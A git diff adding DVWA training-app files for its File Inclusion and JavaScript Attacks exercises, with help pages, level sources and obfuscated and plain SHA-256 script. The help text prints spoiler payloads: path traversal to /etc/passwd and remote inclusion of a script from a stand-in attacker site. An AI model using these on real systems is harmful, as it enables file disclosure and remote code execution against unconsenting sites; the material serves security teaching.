++ Hello " . dvwaCurrentUser() . "
+ Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
+ [back] +
More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . " +
Vulnerability: File Inclusion
+
+
+ \"I needed a password eight characters long so I picked Snow White and the Seven Dwarves.\" ~ Nick Helm
+ [back]
+
+ File 2
++ \"I needed a password eight characters long so I picked Snow White and the Seven Dwarves.\" ~ Nick Helm
+ [back]
More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . " +
Vulnerability: File Inclusion
+
+
+ Welcome back " . dvwaCurrentUser() . "
+ Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
"; +if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) { + $page[ 'body' ] .= "Forwarded for: " . $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; + $page[ 'body' ] .= "
"; +} + $page[ 'body' ] .= "Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
"; +if( array_key_exists( 'HTTP_REFERER', $_SERVER )) { + $page[ 'body' ] .= "You came from: {$_SERVER[ 'HTTP_REFERER' ]}
"; +} + $page[ 'body' ] .= "I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}
+ [back] +
+
+ File 3
++ Welcome back " . dvwaCurrentUser() . "
+ Your IP address is: {$_SERVER[ 'REMOTE_ADDR' ]}
"; +if( array_key_exists( 'HTTP_X_FORWARDED_FOR', $_SERVER )) { + $page[ 'body' ] .= "Forwarded for: " . $_SERVER[ 'HTTP_X_FORWARDED_FOR' ]; + $page[ 'body' ] .= "
"; +} + $page[ 'body' ] .= "Your user-agent address is: {$_SERVER[ 'HTTP_USER_AGENT' ]}
"; +if( array_key_exists( 'HTTP_REFERER', $_SERVER )) { + $page[ 'body' ] .= "You came from: {$_SERVER[ 'HTTP_REFERER' ]}
"; +} + $page[ 'body' ] .= "I'm hosted at: {$_SERVER[ 'HTTP_HOST' ]}
+ [back] +
More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . " +
Vulnerability: File Inclusion
+
+
+ Good job!
+ This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
+ +
\n";
+
+?>
diff --git a/DVWA/vulnerabilities/fi/help/help.php b/DVWA/vulnerabilities/fi/help/help.php
new file mode 100644
index 00000000..e9e71072
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/help/help.php
@@ -0,0 +1,66 @@
+File 4 (Hidden)
++ Good job!
+ This file isn't listed at all on DVWA. If you are reading this, you did something right ;-)
+ +
+
+ +
diff --git a/DVWA/vulnerabilities/fi/include.php b/DVWA/vulnerabilities/fi/include.php
new file mode 100644
index 00000000..5e19b077
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/include.php
@@ -0,0 +1,31 @@
+The PHP function allow_url_include is not enabled.";
+}
+if( !ini_get( 'allow_url_fopen' ) ) {
+ $WarningHtml .= "Help - File Inclusion
+ +
+
+
+
+
+
+
+ About+Some web applications allow the user to specify input that is used directly into file streams or allows the user to upload files to the server. + At a later time the web application accesses the user supplied input in the web applications context. By doing this, the web application is allowing + the potential for malicious file execution. + +If the file chosen to be included is local on the target machine, it is called "Local File Inclusion (LFI). But files may also be included on other + machines, which then the attack is a "Remote File Inclusion (RFI). + +When RFI is not an option. using another vulnerability with LFI (such as file upload and directory traversal) can often achieve the same effect. + +Note, the term "file inclusion" is not the same as "arbitrary file access" or "file disclosure". + ++ + Objective+Read all five famous quotes from '../hackable/flags/fi.php' using only the file inclusion. + ++ + Low Level+This allows for direct input into one of many PHP functions that will include the content when executing. + +Depending on the web service configuration will depend if RFI is a possibility. +Spoiler: LFI: ?page=../../../../../../etc/passwd. + Spoiler: RFI: ?page=http://www.evilsite.com/evil.php.+ + + + Medium Level+The developer has read up on some of the issues with LFI/RFI, and decided to filter the input. However, the patterns that are used, isn't enough. +Spoiler: LFI: Possible, due to it only cycling through the pattern matching once. + Spoiler: RFI: .+ + + + High Level+The developer has had enough. They decided to only allow certain files to be used. However as there are multiple files with the same basename, + they use a wildcard to include them all. +Spoiler: LFI: The filename only has start with a certain value.. + Spoiler: RFI: Need to link in another vulnerability, such as file upload.+ + + + Impossible Level+The developer calls it quits and hardcodes only the allowed pages, with there exact filenames. By doing this, it removes all avenues of attack. + |
+
+ +
Reference:
+Reference:
+Reference:
+Reference:
+ +The PHP function allow_url_fopen is not enabled.
";
+}
+
+
+$page[ 'body' ] .= "
+
+
\n";
+
+?>
diff --git a/DVWA/vulnerabilities/fi/index.php b/DVWA/vulnerabilities/fi/index.php
new file mode 100644
index 00000000..6a912ea8
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/index.php
@@ -0,0 +1,44 @@
+
diff --git a/DVWA/vulnerabilities/fi/source/high.php b/DVWA/vulnerabilities/fi/source/high.php
new file mode 100644
index 00000000..6dd2fb2b
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/source/high.php
@@ -0,0 +1,13 @@
+
diff --git a/DVWA/vulnerabilities/fi/source/impossible.php b/DVWA/vulnerabilities/fi/source/impossible.php
new file mode 100644
index 00000000..2c38116b
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/source/impossible.php
@@ -0,0 +1,20 @@
+
diff --git a/DVWA/vulnerabilities/fi/source/low.php b/DVWA/vulnerabilities/fi/source/low.php
new file mode 100644
index 00000000..36063868
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/source/low.php
@@ -0,0 +1,6 @@
+
diff --git a/DVWA/vulnerabilities/fi/source/medium.php b/DVWA/vulnerabilities/fi/source/medium.php
new file mode 100644
index 00000000..766f4121
--- /dev/null
+++ b/DVWA/vulnerabilities/fi/source/medium.php
@@ -0,0 +1,10 @@
+
diff --git a/DVWA/vulnerabilities/help.css b/DVWA/vulnerabilities/help.css
new file mode 100644
index 00000000..d0ce9da0
--- /dev/null
+++ b/DVWA/vulnerabilities/help.css
@@ -0,0 +1,3 @@
+#low_answer,#medium_answer,#high_answer {
+ display: none;
+}
diff --git a/DVWA/vulnerabilities/help.js b/DVWA/vulnerabilities/help.js
new file mode 100644
index 00000000..1b36804b
--- /dev/null
+++ b/DVWA/vulnerabilities/help.js
@@ -0,0 +1,11 @@
+function show_answer(which) {
+ var block = document.getElementById(which + "_answer");
+ var button = document.getElementById(which + "_button");
+ if (block.style.display === "" || block.style.display === "none") {
+ block.style.display = "block";
+ button.innerText = "Hide Answer";
+ } else {
+ block.style.display = "none";
+ button.innerText = "Show Answer";
+ }
+}
diff --git a/DVWA/vulnerabilities/javascript/help/help.php b/DVWA/vulnerabilities/javascript/help/help.php
new file mode 100644
index 00000000..a679d2e4
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/help/help.php
@@ -0,0 +1,52 @@
+Vulnerability: File Inclusion
+ + {$WarningHtml} + + + +More Information
+-
+
- " . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Remote_File_Inclusion', 'Wikipedia - File inclusion vulnerability' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.1-Testing_for_Local_File_Inclusion', 'WSTG - Local File Inclusion' ) . " +
- " . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-web-security-testing-guide/stable/4-Web_Application_Security_Testing/07-Input_Validation_Testing/11.2-Testing_for_Remote_File_Inclusion', 'WSTG - Remote File Inclusion' ) . " +
+
+ +
diff --git a/DVWA/vulnerabilities/javascript/index.php b/DVWA/vulnerabilities/javascript/index.php
new file mode 100644
index 00000000..65369bad
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/index.php
@@ -0,0 +1,123 @@
+Well done!";
+ } else {
+ $message = "Help - Client Side JavaScript
+ +
+
+ +
+
+
+ About
+The attacks in this section are designed to help you learn about how JavaScript is used in the browser and how it can be manipulated. The attacks could be carried out by just analysing network traffic, but that isn't the point and it would also probably be a lot harder.
+ ++ +
Objective
+Simply submit the phrase "success" to win the level. Obviously, it isn't quite that easy, each level implements different protection mechanisms, the JavaScript included in the pages has to be analysed and then manipulated to bypass the protections.
+ ++
Low Level
+All the JavaScript is included in the page. Read the source and work out what function is being used to generate the token required to match with the phrase and then call the function manually.
+Spoiler: Change the phrase to success and then use the function generate_token() to update the token.
+
+ Medium Level
++ The JavaScript has been broken out into its own file and then minimized. You need to view the source for the included file and then work out what it is doing. Both Firefox and Chrome have a Pretty Print feature which attempts to reverse the compression and display code in a readable way. +
+Spoiler: The file uses the setTimeout function to run the do_elsesomething function which generates the token.
+
+ High Level
++ The JavaScript has been obfuscated by at least one engine. You are going to need to step through the code to work out what is useful, what is garbage and what is needed to complete the mission. +
+Spoiler: If it helps, two packers have been used, the first is from Dan's Tools and the second is the JavaScript Obfuscator Tool.
+ Spoiler 2: This deobfuscation tool seems to work the best on this code deobfuscate javascript.
+ Spoiler 3: This is one way to do it... run the obfuscated JS through a deobfuscation app, intercept the response for the obfuscated JS and swap in the readable version. Work out the flow and you will see three functions that need to be called in order. Call the functions at the right time with the right parameters.
+
+ Impossible Level
+You can never trust the user and have to assume that any code sent to the user can be manipulated or bypassed and so there is no impossible level.
+ ++ +
Reference:
+-
+
+
+
+
+
Invalid token.
"; + } + break; + case 'medium': + if ($token == strrev("XXsuccessXX")) { + $message = "Well done!
"; + } else { + $message = "Invalid token.
"; + } + break; + case 'high': + if ($token == hash("sha256", hash("sha256", "XX" . strrev("success")) . "ZZ")) { + $message = "Well done!
"; + } else { + $message = "Invalid token.
"; + } + break; + default: + $vulnerabilityFile = 'impossible.php'; + break; + } + } else { + $message = "You got the phrase wrong.
"; + } + } else { + $message = "Missing phrase or token.
"; + } +} + +if ( dvwaSecurityLevelGet() == "impossible" ) { +$page[ 'body' ] = <<Vulnerability: JavaScript Attacks
+ +
+
+ >2]|=s[M]<>2]|=r<>2]|=(2t|(r>>6))<>2]|=(R|(r&V))<=2E){l[i>>2]|=(2D|(r>>12))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<>2]|=(2X|(r>>18))<>2]|=(R|((r>>12)&V))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<=1k){k.1C=l[16];k.1A=i-1k;k.1W();k.1L=1d}z{k.1A=i}}p(k.L>4r){k.2i+=k.L/2H<<0;k.L=k.L%2H}A\x20k};N.Q.1s=w(){p(k.1U){A}k.1U=1d;q\x20l=k.l,i=k.2u;l[16]=k.1C;l[i>>2]|=2w[i&3];k.1C=l[16];p(i>=4q){p(!k.1L){k.1W()}l[0]=k.1C;l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0}l[14]=k.2i<<3|k.L>>>29;l[15]=k.L<<3;k.1W()};N.Q.1W=w(){q\x20a=k.C,b=k.B,c=k.E,d=k.F,e=k.J,f=k.I,g=k.H,h=k.D,l=k.l,j,1a,1b,1j,v,1f,1h,1B,1Z,1V,1D;1g(j=16;j<1k;++j){v=l[j-15];1a=((v>>>7)|(v<<25))^((v>>>18)|(v<<14))^(v>>>3);v=l[j-2];1b=((v>>>17)|(v<<15))^((v>>>19)|(v<<13))^(v>>>10);l[j]=l[j-16]+1a+l[j-7]+1b<<0}1D=b&c;1g(j=0;j<1k;j+=4){p(k.2j){p(k.x){1B=4m;v=l[0]-4n;h=v-4o<<0;d=v+4p<<0}z{1B=4v;v=l[0]-4w;h=v-4G<<0;d=v+4D<<0}k.2j=1O}z{1a=((a>>>2)|(a<<30))^((a>>>13)|(a<<19))^((a>>>22)|(a<<10));1b=((e>>>6)|(e<<26))^((e>>>11)|(e<<21))^((e>>>25)|(e<<7));1B=a&b;1j=1B^(a&c)^1D;1h=(e&f)^(~e&g);v=h+1b+1h+K[j]+l[j];1f=1a+1j;h=d+v<<0;d=v+1f<<0}1a=((d>>>2)|(d<<30))^((d>>>13)|(d<<19))^((d>>>22)|(d<<10));1b=((h>>>6)|(h<<26))^((h>>>11)|(h<<21))^((h>>>25)|(h<<7));1Z=d&a;1j=1Z^(d&b)^1B;1h=(h&e)^(~h&f);v=g+1b+1h+K[j+1]+l[j+1];1f=1a+1j;g=c+v<<0;c=v+1f<<0;1a=((c>>>2)|(c<<30))^((c>>>13)|(c<<19))^((c>>>22)|(c<<10));1b=((g>>>6)|(g<<26))^((g>>>11)|(g<<21))^((g>>>25)|(g<<7));1V=c&d;1j=1V^(c&a)^1Z;1h=(g&h)^(~g&e);v=f+1b+1h+K[j+2]+l[j+2];1f=1a+1j;f=b+v<<0;b=v+1f<<0;1a=((b>>>2)|(b<<30))^((b>>>13)|(b<<19))^((b>>>22)|(b<<10));1b=((f>>>6)|(f<<26))^((f>>>11)|(f<<21))^((f>>>25)|(f<<7));1D=b&c;1j=1D^(b&d)^1V;1h=(f&g)^(~f&h);v=e+1b+1h+K[j+3]+l[j+3];1f=1a+1j;e=a+v<<0;a=v+1f<<0}k.C=k.C+a<<0;k.B=k.B+b<<0;k.E=k.E+c<<0;k.F=k.F+d<<0;k.J=k.J+e<<0;k.I=k.I+f<<0;k.H=k.H+g<<0;k.D=k.D+h<<0};N.Q.1e=w(){k.1s();q\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\x201e=m[(C>>28)&o]+m[(C>>24)&o]+m[(C>>20)&o]+m[(C>>16)&o]+m[(C>>12)&o]+m[(C>>8)&o]+m[(C>>4)&o]+m[C&o]+m[(B>>28)&o]+m[(B>>24)&o]+m[(B>>20)&o]+m[(B>>16)&o]+m[(B>>12)&o]+m[(B>>8)&o]+m[(B>>4)&o]+m[B&o]+m[(E>>28)&o]+m[(E>>24)&o]+m[(E>>20)&o]+m[(E>>16)&o]+m[(E>>12)&o]+m[(E>>8)&o]+m[(E>>4)&o]+m[E&o]+m[(F>>28)&o]+m[(F>>24)&o]+m[(F>>20)&o]+m[(F>>16)&o]+m[(F>>12)&o]+m[(F>>8)&o]+m[(F>>4)&o]+m[F&o]+m[(J>>28)&o]+m[(J>>24)&o]+m[(J>>20)&o]+m[(J>>16)&o]+m[(J>>12)&o]+m[(J>>8)&o]+m[(J>>4)&o]+m[J&o]+m[(I>>28)&o]+m[(I>>24)&o]+m[(I>>20)&o]+m[(I>>16)&o]+m[(I>>12)&o]+m[(I>>8)&o]+m[(I>>4)&o]+m[I&o]+m[(H>>28)&o]+m[(H>>24)&o]+m[(H>>20)&o]+m[(H>>16)&o]+m[(H>>12)&o]+m[(H>>8)&o]+m[(H>>4)&o]+m[H&o];p(!k.x){1e+=m[(D>>28)&o]+m[(D>>24)&o]+m[(D>>20)&o]+m[(D>>16)&o]+m[(D>>12)&o]+m[(D>>8)&o]+m[(D>>4)&o]+m[D&o]}A\x201e};N.Q.2U=N.Q.1e;N.Q.1G=w(){k.1s();q\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\x202b=[(C>>24)&u,(C>>16)&u,(C>>8)&u,C&u,(B>>24)&u,(B>>16)&u,(B>>8)&u,B&u,(E>>24)&u,(E>>16)&u,(E>>8)&u,E&u,(F>>24)&u,(F>>16)&u,(F>>8)&u,F&u,(J>>24)&u,(J>>16)&u,(J>>8)&u,J&u,(I>>24)&u,(I>>16)&u,(I>>8)&u,I&u,(H>>24)&u,(H>>16)&u,(H>>8)&u,H&u];p(!k.x){2b.4A((D>>24)&u,(D>>16)&u,(D>>8)&u,D&u)}A\x202b};N.Q.27=N.Q.1G;N.Q.2R=w(){k.1s();q\x201w=O\x20Z(k.x?28:32);q\x201i=O\x204x(1w);1i.1p(0,k.C);1i.1p(4,k.B);1i.1p(8,k.E);1i.1p(12,k.F);1i.1p(16,k.J);1i.1p(20,k.I);1i.1p(24,k.H);p(!k.x){1i.1p(28,k.D)}A\x201w};w\x201P(G,x,1v){q\x20i,T=1c\x20G;p(T===\x272p\x27){q\x20L=[],W=G.W,M=0,r;1g(i=0;i>6));L[M++]=(R|(r&V))}z\x20p(r<2A||r>=2E){L[M++]=(2D|(r>>12));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}z{r=2C+(((r&23)<<10)|(G.1Q(++i)&23));L[M++]=(2X|(r>>18));L[M++]=(R|((r>>12)&V));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}}G=L}z{p(T===\x271n\x27){p(G===2q){1u\x20O\x201t(1l)}z\x20p(1y&&G.1J===Z){G=O\x202r(G)}z\x20p(!1z.1K(G)){p(!1y||!Z.1N(G)){1u\x20O\x201t(1l)}}}z{1u\x20O\x201t(1l)}}p(G.W>1k){G=(O\x20N(x,1d)).S(G).27()}q\x201F=[],2e=[];1g(i=0;i<1k;++i){q\x20b=G[i]||0;1F[i]=4z^b;2e[i]=4y^b}N.1I(k,x,1v);k.S(2e);k.1F=1F;k.2c=1d;k.1v=1v}1P.Q=O\x20N();1P.Q.1s=w(){N.Q.1s.1I(k);p(k.2c){k.2c=1O;q\x202W=k.27();N.1I(k,k.x,k.1v);k.S(k.1F);k.S(2W);N.Q.1s.1I(k)}};q\x20X=2a();X.1q=X;X.1H=2a(1d);X.1q.2V=2f();X.1H.2V=2f(1d);p(2G){2g.X=X}z{Y.1q=X.1q;Y.1H=X.1H;p(2s){2l(w(){A\x20X})}}})();w\x202y(e){1g(q\x20t=\x22\x22,n=e.W-1;n>=0;n--)t+=e[n];A\x20t}w\x202J(t,y=\x224B\x22){1m.1o(\x221M\x22).1r=1q(1m.1o(\x221M\x22).1r+y)}w\x202B(e=\x224E\x22){1m.1o(\x221M\x22).1r=1q(e+1m.1o(\x221M\x22).1r)}w\x202K(a,b){1m.1o(\x221M\x22).1r=2y(1m.1o(\x222F\x22).1r)}1m.1o(\x222F\x22).1r=\x22\x22;4u(w(){2B(\x224M\x22)},4N);1m.1o(\x224P\x22).4Q(\x224R\x22,2J);2K(\x223O\x22,44);','||||||||||||||||||||this|blocks|HEX_CHARS||0x0F|if|var|code|message||0xFF|t1|function|is224||else|return|h1|h0|h7|h2|h3|key|h6|h5|h4||bytes|index|Sha256|new|method|prototype|0x80|update|type|SHIFT|0x3f|length|exports|root|ArrayBuffer|||||||||||s0|s1|typeof|true|hex|t2|for|ch|dataView|maj|64|ERROR|document|object|getElementById|setUint32|sha256|value|finalize|Error|throw|sharedMemory|buffer|obj|ARRAY_BUFFER|Array|start|ab|block|bc|OUTPUT_TYPES|oKeyPad|digest|sha224|call|constructor|isArray|hashed|token|isView|false|HmacSha256|charCodeAt|WINDOW|crypto|create|finalized|cd|hash|outputType|Buffer|da||||0x3ff||||array|||createMethod|arr|inner|process|iKeyPad|createHmacMethod|module|notString|hBytes|first|createHmacOutputMethod|define|createOutputMethod|algorithm|NODE_JS|string|null|Uint8Array|AMD|0xc0|lastByteIndex|0x800|EXTRA|createHash|do_something|nodeMethod|0xd800|token_part_2|0x10000|0xe0|0xe000|phrase|COMMON_JS|4294967296|window|token_part_3|token_part_1|WEB_WORKER|self|require|eval|nodeWrap|versions|arrayBuffer|JS_SHA256_NO_NODE_JS|undefined|toString|hmac|innerHash|0xf0|0xa2bfe8a1|0xc24b8b70||0xa81a664b||0x92722c85|0x81c2c92e|0xc76c51a3|0x53380d13|0x766a0abb|0x4d2c6dfc|0x650a7354|0x748f82ee|0x84c87814|0x78a5636f|0x682e6ff3|0x8cc70208|0x2e1b2138|0xa4506ceb|0x90befffa|0xbef9a3f7|0x5b9cca4f|0x4ed8aa4a|0x106aa070|0xf40e3585|0xd6990624|0x19a4c116|0x1e376c08|0x391c0cb3|0x34b0bcb5|0x2748774c|0xd192e819|0x0fc19dc6|32768|128|8388608|2147483648|split|0x428a2f98|0x71374491|0x59f111f1|0x3956c25b|0xe9b5dba5|0xb5c0fbcf|0123456789abcdef|JS_SHA256_NO_ARRAY_BUFFER|is|invalid|input|strict|use|JS_SHA256_NO_WINDOW|ABCD|amd|JS_SHA256_NO_COMMON_JS|global|node|0x923f82a4|0xab1c5ed5|0x983e5152|0xa831c66d|0x76f988da|0x5cb0a9dc|0x4a7484aa|0xb00327c8|0xbf597fc7|0x14292967|0x06ca6351||0xd5a79147|0xc6e00bf3|0x2de92c6f|0x240ca1cc|0x550c7dc3|0x72be5d74|0x243185be|0x12835b01|0xd807aa98|0x80deb1fe|0x9bdc06a7|0xc67178f2|0xefbe4786|0xe49b69c1|0xc19bf174|0x27b70a85|0x3070dd17|300032|1413257819|150054599|24177077|56|4294967295|0x5be0cd19|while|setTimeout|704751109|210244248|DataView|0x36|0x5c|push|ZZ|Object|143694565|YY|0x1f83d9ab|1521486534|0x367cd507|0xc1059ed8|0xffc00b31|0x68581511|0x64f98fa7|XX|300|0x9b05688c|send|addEventListener|click|utf8|0xbefa4fa4|0xf70e5939|0x510e527f|0xbb67ae85|0x6a09e667|0x3c6ef372|0xa54ff53a|JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW','split'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};eval(function(d,e,f,g,h,i){h=function(j){return(j0x23?String[b('0x0')](j+0x1d):j[b('0x1')](0x24));};if(!''[b('0x2')](/^/,String)){while(f--){i[h(f)]=g[f]||h(f);}g=[function(k){if('wpA'!==b('0x3')){return i[k];}else{while(f--){i[k(f)]=g[f]||k(f);}g=[function(l){return i[l];}];k=function(){return b('0x4');};f=0x1;}}];h=function(){return b('0x4');};f=0x1;};while(f--){if(g[f]){if(b('0x5')===b('0x6')){return i[h];}else{d=d[b('0x2')](new RegExp('\x5cb'+h(f)+'\x5cb','g'),g[f]);}}}return d;}(b('0x7'),0x3e,0x137,b('0x8')[b('0x9')]('|'),0x0,{}));
diff --git a/DVWA/vulnerabilities/javascript/source/high.php b/DVWA/vulnerabilities/javascript/source/high.php
new file mode 100644
index 00000000..f37783d4
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/high.php
@@ -0,0 +1,3 @@
+';
+?>
diff --git a/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js b/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js
new file mode 100644
index 00000000..3db08e8a
--- /dev/null
+++ b/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js
@@ -0,0 +1,540 @@
+/**
+ * [js-sha256]{@link https://github.com/emn178/js-sha256}
+ *
+ * @version 0.9.0
+ * @author Chen, Yi-Cyuan [emn178@gmail.com]
+ * @copyright Chen, Yi-Cyuan 2014-2017
+ * @license MIT
+ */
+/*jslint bitwise: true */
+(function () {
+ 'use strict';
+
+ var ERROR = 'input is invalid type';
+ var WINDOW = typeof window === 'object';
+ var root = WINDOW ? window : {};
+ if (root.JS_SHA256_NO_WINDOW) {
+ WINDOW = false;
+ }
+ var WEB_WORKER = !WINDOW && typeof self === 'object';
+ var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node;
+ if (NODE_JS) {
+ root = global;
+ } else if (WEB_WORKER) {
+ root = self;
+ }
+ var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports;
+ var AMD = typeof define === 'function' && define.amd;
+ var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined';
+ var HEX_CHARS = '0123456789abcdef'.split('');
+ var EXTRA = [-2147483648, 8388608, 32768, 128];
+ var SHIFT = [24, 16, 8, 0];
+ var K = [
+ 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5,
+ 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174,
+ 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da,
+ 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967,
+ 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85,
+ 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070,
+ 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3,
+ 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2
+ ];
+ var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer'];
+
+ var blocks = [];
+
+ if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) {
+ Array.isArray = function (obj) {
+ return Object.prototype.toString.call(obj) === '[object Array]';
+ };
+ }
+
+ if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) {
+ ArrayBuffer.isView = function (obj) {
+ return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer;
+ };
+ }
+
+ var createOutputMethod = function (outputType, is224) {
+ return function (message) {
+ return new Sha256(is224, true).update(message)[outputType]();
+ };
+ };
+
+ var createMethod = function (is224) {
+ var method = createOutputMethod('hex', is224);
+ if (NODE_JS) {
+ method = nodeWrap(method, is224);
+ }
+ method.create = function () {
+ return new Sha256(is224);
+ };
+ method.update = function (message) {
+ return method.create().update(message);
+ };
+ for (var i = 0; i < OUTPUT_TYPES.length; ++i) {
+ var type = OUTPUT_TYPES[i];
+ method[type] = createOutputMethod(type, is224);
+ }
+ return method;
+ };
+
+ var nodeWrap = function (method, is224) {
+ var crypto = eval("require('crypto')");
+ var Buffer = eval("require('buffer').Buffer");
+ var algorithm = is224 ? 'sha224' : 'sha256';
+ var nodeMethod = function (message) {
+ if (typeof message === 'string') {
+ return crypto.createHash(algorithm).update(message, 'utf8').digest('hex');
+ } else {
+ if (message === null || message === undefined) {
+ throw new Error(ERROR);
+ } else if (message.constructor === ArrayBuffer) {
+ message = new Uint8Array(message);
+ }
+ }
+ if (Array.isArray(message) || ArrayBuffer.isView(message) ||
+ message.constructor === Buffer) {
+ return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex');
+ } else {
+ return method(message);
+ }
+ };
+ return nodeMethod;
+ };
+
+ var createHmacOutputMethod = function (outputType, is224) {
+ return function (key, message) {
+ return new HmacSha256(key, is224, true).update(message)[outputType]();
+ };
+ };
+
+ var createHmacMethod = function (is224) {
+ var method = createHmacOutputMethod('hex', is224);
+ method.create = function (key) {
+ return new HmacSha256(key, is224);
+ };
+ method.update = function (key, message) {
+ return method.create(key).update(message);
+ };
+ for (var i = 0; i < OUTPUT_TYPES.length; ++i) {
+ var type = OUTPUT_TYPES[i];
+ method[type] = createHmacOutputMethod(type, is224);
+ }
+ return method;
+ };
+
+ function Sha256(is224, sharedMemory) {
+ if (sharedMemory) {
+ blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] =
+ blocks[4] = blocks[5] = blocks[6] = blocks[7] =
+ blocks[8] = blocks[9] = blocks[10] = blocks[11] =
+ blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0;
+ this.blocks = blocks;
+ } else {
+ this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0];
+ }
+
+ if (is224) {
+ this.h0 = 0xc1059ed8;
+ this.h1 = 0x367cd507;
+ this.h2 = 0x3070dd17;
+ this.h3 = 0xf70e5939;
+ this.h4 = 0xffc00b31;
+ this.h5 = 0x68581511;
+ this.h6 = 0x64f98fa7;
+ this.h7 = 0xbefa4fa4;
+ } else { // 256
+ this.h0 = 0x6a09e667;
+ this.h1 = 0xbb67ae85;
+ this.h2 = 0x3c6ef372;
+ this.h3 = 0xa54ff53a;
